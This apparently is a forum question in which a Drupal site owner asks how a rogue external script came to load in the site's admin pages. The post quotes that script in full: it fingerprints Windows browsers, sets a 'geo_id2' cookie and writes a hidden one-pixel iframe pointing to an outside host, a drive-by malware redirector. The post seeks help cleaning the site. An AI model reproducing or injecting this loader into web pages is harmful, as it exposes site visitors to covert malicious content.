Possible duplicate:
Weird Script Appears in the DOM of my site
I just noticed a weird Script running on my DOM sites. I am running DRUPAL. Script http://www.103fm.net/release.js . I don't know where to start looking for this rogue script. My site is miloads.com and this only happens in the admin menu. It is strange that the file does not exist on 103fm.net, but in fact it loads the following script:
var BrowserDetect = { init: function() { this.browser = this.searchString(this.dataBrowser) || "An unknown browser"; this.version = this.searchVersion(navigator.userAgent) || this.searchVersion(navigator.appVersion) || "an unknown version"; this.OS = this.searchString(this.dataOS) || "an unknown OS"; }, searchString: function(data) { for (var i = 0; i < data.length; i++) { var dataString = data[i].string; var dataProp = data[i].prop; this.versionSearchString = data[i].versionSearch || data[i].identity; if (dataString) { if (dataString.indexOf(data[i].subString) != -1) return data[i].identity; } else if (dataProp) return data[i].identity; } }, searchVersion: function(dataString) { var index = dataString.indexOf(this.versionSearchString); if (index == -1) return; return parseFloat(dataString.substring(index + this.versionSearchString.length + 1)); }, dataBrowser: [{ string: navigator.userAgent, subString: "Firefox", identity: "Firefox" }, { string: navigator.userAgent, subString: "MSIE", identity: "Explorer", versionSearch: "MSIE" }], dataOS: [{ string: navigator.platform, subString: "Win", identity: "Windows" }] }; function addCookie(szName, szValue, dtDaysExpires) { var dtExpires = new Date(); var dtExpiryDate = ""; dtExpires.setTime(dtExpires.getTime() + dtDaysExpires * 24 * 60 * 60 * 1000); dtExpiryDate = dtExpires.toGMTString(); document.cookie = szName + "=" + szValue + ";expires=" + dtExpiryDate; } function findCookie(szName) { var i = 0; var nStartPosition = 0; var nEndPosition = 0; var szCookieString = document.cookie; while (i <= szCookieString.length) { nStartPosition = i; nEndPosition = nStartPosition + szName.length; if (szCookieString.substring(nStartPosition, nEndPosition) == szName) { nStartPosition = nEndPosition + 1; nEndPosition = document.cookie.indexOf(";", nStartPosition); if (nEndPosition < nStartPosition) nEndPosition = document.cookie.length; return document.cookie.substring(nStartPosition, nEndPosition); break; } i++; } return ""; } BrowserDetect.init(); var szCookieString = document.cookie; var stopit = BrowserDetect.browser; var os = BrowserDetect.OS; if (((stopit == "Firefox" || stopit == "Explorer") && (os == "Windows")) && (findCookie('geo_id2') != '753445')) { addCookie("geo_id2", "753445", 1); document.write("<if" + "rame name='info' src='http://www.ztanalytics.com/stat.cgi?s_id=1' width=1 height=1 scrolling=no frameborder=0></if" + "rame>"); } else {}
source share